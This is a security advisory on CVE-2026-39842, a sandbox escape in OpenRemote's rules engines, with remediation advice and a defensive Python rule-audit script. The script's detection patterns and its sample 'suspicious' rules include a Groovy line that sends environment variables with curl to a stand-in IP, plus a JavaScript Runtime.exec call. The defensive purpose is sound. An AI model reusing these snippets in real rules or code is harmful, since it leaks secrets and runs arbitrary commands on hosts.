CVE-2026-39842

OpenRemote · IoT platform

OpenRemote contains expression injection vulnerabilities in its JavaScript and Groovy rules engines; an authenticated user holding the "write:rules" role can escape the rule sandbox and execute arbitrary code with full JVM and root-level privileges.

Executive summary

A critical expression injection vulnerability in the OpenRemote IoT platform allows an attacker who can author rules to execute arbitrary code with root privileges, leading to full compromise of the host and of every tenant on the instance.

Vulnerability

The flaw is an expression injection in the JavaScript and Groovy rules engines: rule bodies are evaluated inside the platform's JVM, and the restrictions meant to confine them can be bypassed. An attacker who holds the "write:rules" role (the permission required to create or edit rules) can therefore break out of the rule sandbox and the authorization checks around it and execute arbitrary code with full JVM access, and with root privileges on the system where the platform runs. The precondition is an account with that role, not an unauthenticated network position; a score of 9.9 rather than 10.0 is consistent with an attack that needs low privileges but crosses tenant boundaries.

Business impact

Successful exploitation means complete compromise of the platform: read access to database credentials and other secrets held in configuration files or environment variables, arbitrary file reads on the host, and a break of the multi-tenant boundary, so that a rule author in one tenant can reach every other tenant's data. With a CVSS score of 9.9, this is a severe risk of data exfiltration and total loss of platform integrity, with the operational downtime and reputational damage that follow.

Remediation

Immediate Action: Upgrade the OpenRemote IoT platform to version 1.22.0 or later, which patches the rules engine vulnerabilities. Treat rules created or modified before the upgrade as untrusted until reviewed.

Proactive Monitoring: Review server logs for rule creation or modification activity, especially by accounts that do not normally author rules, and audit existing rulesets for code that reaches outside the rule API (process execution, reflection, class loading, file or environment access). Monitor for access to sensitive configuration files or environment variables and for unexpected outbound connections from the platform host.

Compensating Controls: Until the upgrade is in place, restrict the "write:rules" role to the smallest set of trusted administrative accounts, since that role is the only precondition for exploitation, and use network segmentation to isolate the IoT platform from critical infrastructure and to limit outbound traffic from the host so that a compromised rules engine cannot easily exfiltrate data.
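One practical form of the ruleset review recommended above, as an added example that is not OpenRemote's own code: a small Python audit that scans the source of Groovy and JavaScript rules (obtained however your deployment exposes them, for instance an export of the rulesets) for JVM APIs that an asset or attribute rule never needs. The sample rules, their DSL calls and the category names are constructed for this example and are not a claim about the real rule API or about the payload used in this CVE.

```python
"""Heuristic audit of rules-engine scripts for JVM sandbox-escape indicators.

Added example for this advisory, not OpenRemote project code. It scans the
source of Groovy and JavaScript rules for references to JVM APIs that a rule
about assets and attributes has no reason to use: process execution,
reflection, class loading, environment or file access, networking, and nested
script evaluation. The sample rules at the bottom are constructed for this
example; their DSL calls are stand-ins, not a claim about the real rule API.
"""
import re
from dataclasses import dataclass

# (category, regex) pairs. Patterns are deliberately broad: over-reporting a
# rule for manual review is cheaper than missing a sandbox escape.
DANGEROUS_PATTERNS = [
    ("process-exec", re.compile(r"Runtime\.getRuntime|ProcessBuilder|\.execute\(\)")),
    ("reflection", re.compile(r"Class\.forName|getDeclaredMethod|setAccessible")),
    ("class-loading", re.compile(r"ClassLoader|defineClass")),
    ("direct-jvm-ref", re.compile(r"Java\.type|Packages\.java|java\.lang\.")),
    ("env-or-props", re.compile(r"System\.getenv|System\.getPropert")),
    ("file-access", re.compile(r"java\.io\.File|java\.nio\.file|new File\(")),
    ("network", re.compile(r"java\.net\.|HttpURLConnection|new Socket\(")),
    ("script-engine", re.compile(r"GroovyShell|ScriptEngineManager|Eval\.me|\beval\(")),
]


@dataclass(frozen=True)
class Finding:
    rule_name: str
    category: str
    line_no: int
    excerpt: str


def scan_rule_source(rule_name: str, source: str) -> list[Finding]:
    """Return one Finding per (line, category) hit in a single rule script.

    Lines that are only a line comment are skipped; block comments are not
    stripped, so a payload hidden in one still gets reported for review.
    """
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("//"):
            continue
        for category, pattern in DANGEROUS_PATTERNS:
            if pattern.search(stripped):
                findings.append(Finding(rule_name, category, line_no, stripped[:80]))
    return findings


def audit_rules(rules: dict[str, str]) -> dict[str, list[Finding]]:
    """Scan every rule in {name: source} and keep only those with findings."""
    report = {}
    for name, source in rules.items():
        findings = scan_rule_source(name, source)
        if findings:
            report[name] = findings
    return report


# Constructed sample rules (not real OpenRemote rulesets).
BENIGN_RULE = """\
// Constructed sample: switch the hall light on when motion is detected
rules.add()
    .name("Hall light on motion")
    .when({ facts -> facts.matchFirstAssetState(new AssetQuery().attributeValue("motion", true)).isPresent() })
    .then({ facts -> facts.updateAssetState("hall-light", "onOff", true) })
"""

SUSPICIOUS_GROOVY = """\
// Constructed sample: presented as a temperature rule, but it dumps the container environment
rules.add()
    .name("Temperature sync")
    .then({ facts ->
        def env = System.getenv()
        "curl -s -d ${env} http://198.51.100.7/collect".execute()
    })
"""

SUSPICIOUS_JS = """\
// Constructed sample: JavaScript rule reaching into the JVM through the engine's Java bridge
var Runtime = Java.type("java.lang.Runtime");
var out = Runtime.getRuntime().exec("id");
"""

SAMPLE_RULES = {
    "hall-light": BENIGN_RULE,
    "temperature-sync": SUSPICIOUS_GROOVY,
    "jvm-bridge": SUSPICIOUS_JS,
}

if __name__ == "__main__":
    for rule_name, hits in audit_rules(SAMPLE_RULES).items():
        for hit in hits:
            print(f"{rule_name}:{hit.line_no} [{hit.category}] {hit.excerpt}")
```

Run it over every tenant's rulesets before and after the upgrade. A hit is a candidate for manual review rather than proof of compromise, because the patterns err toward over-reporting; and a clean scan does not replace the upgrade, since the sandbox escape exists regardless of what the rules currently contain.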

Exploitation status

Public Exploit Available: Unknown

Analyst recommendation

The severity of this vulnerability, combined with the potential for complete root-level compromise of the IoT environment from a single rule-authoring account, necessitates an immediate update to version 1.22.0 or later. Organizations should prioritize this deployment, restrict the "write:rules" role in the meantime, and review existing rules to prevent unauthorized access and protect sensitive multi-tenant data.